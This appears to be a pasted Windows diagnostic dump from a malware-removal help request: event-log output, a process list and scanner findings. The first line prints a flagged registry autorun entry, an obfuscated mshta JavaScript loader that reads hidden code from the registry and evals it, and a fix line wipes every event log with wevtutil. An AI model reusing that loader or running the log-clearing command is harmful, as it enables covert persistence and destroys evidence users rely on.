HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
C:\Users\Dorraine\AppData\Local\360fd
C:\Users\Dorraine\AppData\Local\7df78865
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:09:33 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 08/12/2016 6:30:47 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 05/12/2016 4:11:37 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 25/11/2016 6:24:29 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 20/11/2016 9:34:31 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 14/11/2016 6:10:56 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 12/11/2016 11:30:59 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 12/11/2016 4:26:35 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 11/11/2016 7:24:42 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 11/11/2016 7:03:35 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 03/11/2016 11:29:02 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 20/10/2016 10:16:17 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 13/10/2016 7:20:16 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 11/01/2017 7:08:31 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:08:30 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:06:23 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:06:22 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:04:14 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:04:14 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:02:06 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:02:06 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:59:58 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:59:58 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:57:50 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:57:50 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:55:42 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:55:42 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:53:34 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:53:34 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:51:26 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:51:26 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:49:18 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:49:18 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_Compact_Flash&Rev_1.01#058F63626420&1#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_MS#MS-Pro&Rev_1.03#058F63626420&3#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_SD#MMC&Rev_1.00#058F63626420&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_SM#xD_Picture&Rev_1.02#058F63626420&2#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 7:54:41 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name videos.vehicledata.com timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 07/01/2017 8:26:51 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 04/01/2017 6:04:12 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 153 Source: disk
The IO operation at logical block address 0x2388 for Disk 1 (PDO name: \Device\00000031) was retried.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 6:49:46 PM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name vast.ssp.optimatic.com timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 30/12/2016 8:24:23 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 29/12/2016 8:28:50 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 28/12/2016 5:01:57 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name dpm.demdex.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 28/12/2016 1:19:36 AM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_Compact_Flash&Rev_1.01#058F63626420&1#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.
Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.
Context: Application, SystemIndex Catalog
Details:
The system cannot find the file specified. (HRESULT : 0x80070002) (0x80070002)
Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Process CPU Private Bytes Working Set PID Description Company Name
armsvc.exe 1,324 K 4,976 K 2196 Adobe Acrobat Update Service Adobe Systems Incorporated
atieclxx.exe 2,156 K 4,112 K 1132
atiesrxx.exe 920 K 2,340 K 1076 AMD External Events Service Module AMD
audiodg.exe 6,064 K 10,740 K 3708
csrss.exe 1,396 K 3,008 K 440
ctfmon.exe 2,336 K 6,564 K 7876 CTF Loader Microsoft Corporation
DbxSvc.exe 2,384 K 2,568 K 2124 Dropbox Service Dropbox, Inc.
dllhost.exe 1,884 K 8,412 K 1332 COM Surrogate Microsoft Corporation
fontdrvhost.exe 816 K 2,696 K 4780
hpqbam08.exe 1,856 K 8,404 K 5736 HP CUE Alert Popup Window Objects Hewlett-Packard Co.
hpqgpc01.exe 2,860 K 11,224 K 6028 GPCore COM object Hewlett-Packard
hpqste08.exe 4,408 K 11,040 K 5668 HP CUE Status Root Hewlett-Packard Co.
hpwuschd2.exe 1,192 K 5,292 K 5112 hpwuSchd Application Hewlett-Packard
MpCmdRun.exe 3,048 K 9,760 K 5520
mqsvc.exe 3,920 K 5,504 K 2092 Message Queuing Service Microsoft Corporation
MSASCuiL.exe 3,108 K 10,504 K 4648 Windows Defender notification icon Microsoft Corporation
procexp.exe 2,844 K 9,752 K 1892 Sysinternals Process Explorer Sysinternals - www.sysinternals.com
RuntimeBroker.exe 10,124 K 28,808 K 3292 Runtime Broker Microsoft Corporation
SearchUI.exe Suspended 50,108 K 54,292 K 1176 Search and Cortana application Microsoft Corporation
ShellExperienceHost.exe Suspended 37,440 K 45,568 K 3252 Windows Shell Experience Host Microsoft Corporation
sihost.exe 4,508 K 15,664 K 3636 Shell Infrastructure Host Microsoft Corporation
SkypeHost.exe Suspended 4,680 K 13,220 K 6880 Microsoft Skype Preview Microsoft Corporation
